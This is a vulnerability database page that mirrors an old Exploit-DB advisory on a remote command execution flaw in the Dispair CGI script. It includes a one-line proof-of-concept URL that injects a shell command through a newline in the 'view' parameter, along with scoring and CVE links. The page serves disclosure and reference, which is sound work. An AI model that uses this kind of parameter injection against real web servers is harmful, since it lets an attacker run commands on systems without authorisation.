Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbAnonymousEDB-ID:21679
HistoryJul 30, 2002 - 12:00 a.m.

Dispair 0.1/0.2 - Remote Command Execution

2002-07-3000:00:00
anonymous
www.exploit-db.com
19

AI Score

7.4

Confidence

Low

EPSS

0.123

Percentile

95.5%

JSON
source: https://www.securityfocus.com/bid/5392/info

Dispair fails to sufficiently validate user-supplied input before it is passed to the shell via the Perl open() function. Remote attackers may potentially exploit this issue to execute arbitrary commands on the underlying shell with the privileges of the webserver process.

http://target/cgi-bin/dispair.cgi?file=fiddle&view=%0A/usr/bin/id

Related

cve 1
cvelist 1
nvd 1
cve
cve
CVE-2002-1868
2005-06-28 04:00:00
cvelist
cvelist
CVE-2002-1868
2005-06-28 04:00:00
nvd
nvd
CVE-2002-1868
2002-12-31 05:00:00

AI Score

7.4

Confidence

Low

EPSS

0.123

Percentile

95.5%

JSON
Related for EDB-ID:21679
cve1cvelist1nvd1